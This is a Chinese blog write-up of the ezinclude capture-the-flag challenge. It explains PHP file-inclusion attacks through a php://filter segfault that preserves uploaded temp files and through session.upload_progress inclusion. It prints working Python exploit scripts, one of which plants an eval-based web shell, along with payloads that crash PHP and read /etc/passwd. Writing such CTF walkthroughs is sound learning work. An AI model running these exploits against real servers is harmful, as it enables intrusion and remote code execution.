[NPUCTF2020]ezinclude

已于 2022-09-07 09:41:14 修改
阅读量594 收藏 4
点赞数 1
分类专栏: BUUCTF 文章标签: 安全 php
于 2022-09-07 09:40:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowlyzz/article/details/126734136
版权

目录

前言 :

考点:

解题:

预期解:

预期解二:

前言 :

仅记录我刷题历程。

考点:

临时文件上传包含

利用segment fault 导致 系统崩溃上传恶意文件

session.upload_progress 上传临时文件

解题:

进入环境 说 用户和密码错误 ,抓包:

Hash  爆破是不太可能的。 给了  hash  直接传入pass。

 访问 flflflflag.php

 有个包含 用伪协议读取 

<html>
<head>
<script language="javascript" type="text/javascript">
           window.location.href="404.html";
</script>
<title>this_is_not_fl4g_and_出题人_wants_girlfriend</title>
</head>
<>
<body>
<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){
	die('nonono');
}
@include($file);
echo 'include($_GET["file"])';
?>
</body>
</html>

预期解:

既然是包含  可以上传临时文件到 /tmp/下     文件名是PHP_xxxxxxxx 但是需要爆破。

换另一种方法。

扫目录,可以扫到dir.php 这个列出了 /tmp 下所有文件,可以利用php7  segment fault特性。

向PHP发送含有文件区块的数据包时,让PHP异常崩溃退出,POST的临时文件就会被保留

php < 7.2 

php://filter/string.strip_tags/resource=/etc/passwd

php7 老版本通杀
php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA
 

脚本:

import requests
from io import BytesIO
url="http://f0af8aa4-9e9c-40a8-9003-175dbc6f69f8.node3.buuoj.cn/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
payload="<?php phpinfo();?>"
files={
    "file":BytesIO(payload.encode())
}
r=requests.post(url=url,files=files,allow_redirects=False) //禁止重定向

print(r.text)

运行后,看到已经让容器暂时崩溃:

 访问 dir.php 是能够看到我们上传的临时文件名字的。

 访问,注意是tmp/  下:

预期解二:

利用session.upload_progress 进行 session 文件包含:

详细的可以参考这篇好文章:利用session.upload_progress进行文件包含和反序列化渗透 - FreeBuf网络安全行业门户

这里直接给上exp

import io
import sys
import requests
import threading


host = "http://3e77e1cd-842a-43c8-90d4-58b0f5c394d9.node4.buuoj.cn:81/flflflflag.php"
sessid = 'snowy'
def POST(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            host,
            data={
                "PHP_SESSION_UPLOAD_PROGRESS": "<?php system('ls /');fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');echo md5('1');?>"},
            files={"file": ('a.txt', f)},
            cookies={'PHPSESSID': sessid}

        )
def READ(session):
    while True:
        response = session.get(f'{host}?file=/tmp/sess_{sessid}')
        # print(response.text)
        if 'c4ca4238a0b923820dcc509a6f75849b' not in response.text:
            print('[+++]retry')
        else:
            print(response.text)
            sys.exit(0)

with requests.session() as session:
    t1 = threading.Thread(target=POST, args=(session, ))
    t1.daemon = True
    t1.start()
    READ(session)

进入 shell.php  执行phpinfo就能看到flag

snowlyzz
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
obfuscation
05-11
obfuscation 基于Allatori的Java代码混淆工具 使用Allatori混淆工具写的一个Maven插件 mvn install此项目,然后在想要混淆的项目的pom文件中引入此插件,并指定配置文件全路径以及要混淆的类所在路径即可使用 支持Windows、Linux、MacOS 详情请参阅博客:
flash涂鸦板
12-10
简单易操作 一木了然 而且能让你快速体验到FLASH的操作乐趣 让你有想去学的冲动 而且能让你快速掌握简单操作
解读“模块的沟通”
08-04
我在写Verilog的时候,经常会用到一种方法(这一种方法是akuei2发明的)为了大家能看懂我的程序。
[NPUCTF2020]EzRSA Writeup
bestkasscn的博客
12-02 524
[NPUCTF2020]EzRSA 题目描述 from gmpy2 import lcm , powmod , invert , gcd , mpz from Crypto.Util.number import getPrime from sympy import nextprime from random import randint p = getPrime(1024) q = getPrime(1024) n = p * q gift = lcm(p - 1 , q - 1) e = 54722 fl
[NPUCTF2020]ezinclude 文件包含两大 getshell方式
最新发布
m0_64180167的博客
10-11 941
说一下我的思路吧robots没有扫描发现存在 dir.php然后404.html 报错这个又正好存在漏洞 所以前面全去看这个了结果根本不是这样做。。。正确的思路是这样发现变量 认为是 name和 pass传递参数或者通过爆破 但是太慢了我们可以抓包测试发现了 hash 因为提示我们MD5 所以我们需要注意然后我们传递一个?name=2发现hash变了 这里我们就多半能确定 cookie是我们的pass因为 name改变 cookie也改变 然后都是hash值。
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
[NPUCTF2020]ezinclude 1
weixin_46196627的博客
02-09 306
大致意思是:使用伪协议php://filter中的string.strip_stags 过滤器 并上传文件 php的垃圾回收机制就不会继续执行 使post传递的文件存储在/temp/文件下。name=1&pass=cookie值 抓包发现 flflflag.php文件。得到$_get[‘file’] include 使用php://filter 对代码读取。php7.0.0-7.1.2可以利用。php7.1.3-7.2.1可以利用。php7.2.2-7.2.8可以利用。源代码get参数进行文件包含。
一道CTF题ezinclude引出的蚁剑新姿势
sash1mi
12-11 3226
[NPUCTF2020]ezinclude 0x01 初探题目 查看页面源码 fuzz一波 出来一个dir.php 看看dir.php,关于数组的东西 先留着 说不定下面有用 抓包看看index.php有甚么 一个Hash还是蛮醒目的 结合刚才的页面信息username&password 尝试去拼接url /?name=1&pass=576322dd496b99d07b5b0f7fa7934a25(所给的Hash) 拿到一个flflflflag.php 访问 跳转到了404.h
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
07-16
根据提示,在代码注释中可以找到隐藏的 `e` 值。以下是给定代码的修改版本,以显示隐藏的 `e` 值: ```python from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) # Hidden e = 65537 q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值